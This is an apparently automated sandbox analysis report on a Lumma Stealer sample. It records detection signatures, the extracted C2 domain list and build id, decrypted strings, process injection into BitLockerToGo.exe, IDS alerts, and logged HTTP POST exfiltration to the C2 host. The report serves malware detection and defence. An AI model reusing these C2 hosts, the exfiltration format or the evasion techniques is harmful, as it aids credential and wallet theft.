Windows Analysis Report
64pOGv7k4N.exe

Overview

General Information

Sample name:64pOGv7k4N.exe
renamed because original name is a hash value
Original sample name:a56fc11692ab8baf7f9e3b80540d63c5.exe
Analysis ID:1585289
MD5:a56fc11692ab8baf7f9e3b80540d63c5
SHA1:4ddd8e40b3ca6c4cd0cf4156b5b163074065a79c
SHA256:0bcd82ed4ea3e12cbaabc50df612d48078604e4d0985e9a240afc24630afa4d7
Tags:exe, user-abuse_ch

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 64pOGv7k4N.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\64pOGv7k4N.exe" MD5: A56FC11692AB8BAF7F9E3B80540D63C5)
    • BitLockerToGo.exe (PID: 7912 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["abruptyopsn.shop", "rabidcowse.shop", "noisycuttej.shop", "wholersorie.shop", "cloudewahsj.shop", "tirepublicerj.shop", "framekgirus.shop", "mooncobudy.click", "nearycrepso.shop"], "Build id": "Jwquln--3112YT"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1648435573.0000000011780000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
00000003.00000003.1725784713.0000000003326000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: BitLockerToGo.exe PID: 7912 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: BitLockerToGo.exe PID: 7912 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched

              AV Detection

              Source: 64pOGv7k4N.exeAvira: detected
              Source: mooncobudy.clickAvira URL Cloud: Label: malware
              Source: https://mooncobudy.click/d&Avira URL Cloud: Label: malware
              Source: https://mooncobudy.click:443/apiv1np.default-release/key4.dbPKAvira URL Cloud: Label: malware
              Source: https://mooncobudy.click/Avira URL Cloud: Label: malware
              Source: https://mooncobudy.click:443/apiMAvira URL Cloud: Label: malware
              Source: https://mooncobudy.click/apijYcAvira URL Cloud: Label: malware
              Source: https://mooncobudy.click:443/apiAvira URL Cloud: Label: malware
              Source: https://mooncobudy.click/apiAvira URL Cloud: Label: malware
              Source: https://mooncobudy.click/4%G##Avira URL Cloud: Label: malware
              Source: 3.2.BitLockerToGo.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "rabidcowse.shop", "noisycuttej.shop", "wholersorie.shop", "cloudewahsj.shop", "tirepublicerj.shop", "framekgirus.shop", "mooncobudy.click", "nearycrepso.shop"], "Build id": "Jwquln--3112YT"}
              Source: 64pOGv7k4N.exeReversingLabs: Detection: 73%
              Source: 64pOGv7k4N.exeVirustotal: Detection: 72%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: 64pOGv7k4N.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: mooncobudy.click
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: Jwquln--3112YT
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00419362 CryptUnprotectData,3_2_00419362
              Source: 64pOGv7k4N.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49913 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49919 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49930 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49944 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49951 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49963 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49973 version: TLS 1.2
              Source: 64pOGv7k4N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: 64pOGv7k4N.exe, 00000000.00000002.1648435573.00000000118FC000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: 64pOGv7k4N.exe, 00000000.00000002.1648435573.00000000118FC000.00000004.00001000.00020000.00000000.sdmp

              Networking

              Source: Network traffic, Suricata IDS: 2058715 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mooncobudy .click) : 192.168.2.3:53184 -> 1.1.1.1:53
              Source: Network traffic, Suricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49913 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49944 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49919 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49930 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49963 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49973 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49951 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49983 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.3:49913 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.3:49913 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.3:49944 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.3:49919 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.3:49919 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.3:49973 -> 188.114.97.3:443
              Source: Malware configuration extractor, URLs: abruptyopsn.shop
              Source: Malware configuration extractor, URLs: rabidcowse.shop
              Source: Malware configuration extractor, URLs: noisycuttej.shop
              Source: Malware configuration extractor, URLs: wholersorie.shop
              Source: Malware configuration extractor, URLs: cloudewahsj.shop
              Source: Malware configuration extractor, URLs: tirepublicerj.shop
              Source: Malware configuration extractor, URLs: framekgirus.shop
              Source: Malware configuration extractor, URLs: mooncobudy.click
              Source: Malware configuration extractor, URLs: nearycrepso.shop
              Source: Joe Sandbox View, IP Address: 188.114.97.3
              Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
              Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49913 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49944 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49919 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49930 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49963 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49973 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49951 -> 188.114.97.3:443
              Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49983 -> 188.114.97.3:443
              Source: global traffic, HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: mooncobudy.click
              Source: global traffic, HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 48
                  Host: mooncobudy.click
              Source: global traffic, HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=1Y62FI810ZF7YOA
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 12845
                  Host: mooncobudy.click
              Source: global traffic, HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=WJMOPOOATFMWBH
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 12087
                  Host: mooncobudy.click
              Source: global traffic, HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=RS0CM4VYQD4PSF2G
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 20445
                  Host: mooncobudy.click
              Source: global traffic, HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=JF9DUC2BWPQ1ZFPQO
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 1231
                  Host: mooncobudy.click
              Source: global traffic, HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=GVWKJB737
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 562220
                  Host: mooncobudy.click
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic, DNS traffic detected: DNS query: mooncobudy.click
              Source: unknown, HTTP traffic detected:
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: mooncobudy.click
              Source: unknown, Network traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknown, Network traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknown, Network traffic detected: HTTP traffic on port 49963 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49913 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49919 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49930 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49944 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49951 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49963 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49973 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Code function: 3_2_00432D70 OpenClipboard, GetClipboardData, GlobalLock, GetWindowLongW, GlobalUnlock, CloseClipboard
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Code function: 3_2_00432FE0 GetDC, GetSystemMetrics, GetSystemMetrics, GetSystemMetrics, GetCurrentObject, GetObjectW, DeleteObject, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt

              System Summary

              Source: 00000000.00000002.1648435573.0000000011780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Metasploit Payloads - file msf.war - contents, Author: Florian Roth
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe, Code function: 0_2_00B0E0C0 NtWaitForSingleObject
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040C6F03_2_0040C6F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041DE903_2_0041DE90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004187403_2_00418740
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00428F6C3_2_00428F6C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004147773_2_00414777
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004237D03_2_004237D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00417FE13_2_00417FE1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041EFE03_2_0041EFE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00416F8D3_2_00416F8D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042F7BC3_2_0042F7BC
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Code function: String function: 00AE5C20 appears 432 times
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Code function: String function: 00AE3900 appears 283 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 00407EE0 appears 45 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 00414110 appears 82 times
              Source: 64pOGv7k4N.exe, 00000000.00000002.1648435573.00000000118FC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 64pOGv7k4N.exe
              Source: 64pOGv7k4N.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: 00000000.00000002.1648435573.0000000011780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_00438860 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_00438860
              Source: 64pOGv7k4N.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: BitLockerToGo.exe, 00000003.00000003.1674985802.000000000570A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1696447642.00000000056F9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1675235024.00000000056EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 64pOGv7k4N.exe ReversingLabs: Detection: 73%
              Source: 64pOGv7k4N.exe Virustotal: Detection: 72%
              Source: unknown Process created: C:\Users\user\Desktop\64pOGv7k4N.exe "C:\Users\user\Desktop\64pOGv7k4N.exe"
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Section loaded: powrprof.dll
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Section loaded: umpdc.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windows.storage.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wldp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: webio.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: amsi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: userenv.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: version.dll
              Source: 64pOGv7k4N.exe Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: 64pOGv7k4N.exe Static file information: File size 3805184 > 1048576
              Source: 64pOGv7k4N.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1b4a00
              Source: 64pOGv7k4N.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1ba600
              Source: 64pOGv7k4N.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: 64pOGv7k4N.exe, 00000000.00000002.1648435573.00000000118FC000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: 64pOGv7k4N.exe, 00000000.00000002.1648435573.00000000118FC000.00000004.00001000.00020000.00000000.sdmp
              Source: 64pOGv7k4N.exe Static PE information: real checksum: 0x3a7505 should be: 0x3a10e6
              Source: 64pOGv7k4N.exe Static PE information: section name: .symtab
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Code function: 0_2_00ACD051 pushfd ; ret 0_2_00ACD052
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Code function: 0_2_00ABB208 push esp; retf 0_2_00ABB236
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_0043F000 push eax; mov dword ptr [esp], 5B5A5908h 3_2_0043F005
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_00445408 push ebp; ret 3_2_00445409
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_0044866F pushfd ; retf 3_2_00448677
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\64pOGv7k4N.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
